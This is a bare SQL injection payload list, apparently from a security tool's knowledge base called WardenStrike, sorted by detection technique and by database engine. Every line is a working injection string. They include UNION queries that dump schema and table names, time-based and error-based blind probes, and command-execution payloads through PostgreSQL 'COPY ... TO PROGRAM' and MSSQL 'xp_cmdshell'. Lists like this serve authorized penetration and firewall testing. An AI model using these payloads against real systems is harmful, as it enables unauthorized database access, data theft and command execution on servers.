# SQL Injection Payloads - WardenStrike Knowledge Base
# Detection
'
"
`
')
")
`)
'))
"))
`))
'-'
'&'
'^'
'*'
' OR '1'='1
' OR 1=1--
' OR 1=1#
' OR 1=1/*
" OR "1"="1
" OR 1=1--
') OR ('1'='1
') OR 1=1--
1' ORDER BY 1--
1' ORDER BY 10--
1 UNION SELECT NULL--

# MySQL
' UNION SELECT 1,2,3--
' UNION SELECT NULL,table_name,NULL FROM information_schema.tables--
' UNION SELECT NULL,column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--
' AND BENCHMARK(5000000,MD5('test'))--
1' AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT version())))--

# PostgreSQL
' UNION SELECT NULL,version(),NULL--
'; SELECT pg_sleep(5)--
' AND 1=CAST((SELECT version()) AS int)--
'; COPY (SELECT '') TO PROGRAM 'id'--

# MSSQL
' UNION SELECT NULL,@@version,NULL--
'; WAITFOR DELAY '0:0:5'--
'; EXEC xp_cmdshell('whoami')--
' AND 1=CONVERT(int,(SELECT @@version))--

# Oracle
' UNION SELECT NULL,banner,NULL FROM v$version--
' AND 1=UTL_INADDR.GET_HOST_ADDRESS((SELECT version FROM v$instance))--

# SQLite
' UNION SELECT NULL,sqlite_version(),NULL--

# Time-based blind
' AND SLEEP(5)--
' AND (SELECT SLEEP(5))--
'; WAITFOR DELAY '0:0:5'--
' AND pg_sleep(5)--
1' AND IF(1=1,SLEEP(5),0)--

# Boolean-based blind
' AND 1=1--
' AND 1=2--
' AND SUBSTRING(@@version,1,1)='5'--

# Error-based
' AND UPDATEXML(1,CONCAT(0x7e,(SELECT version())),1)--
' AND ROW(1,1)>(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)--
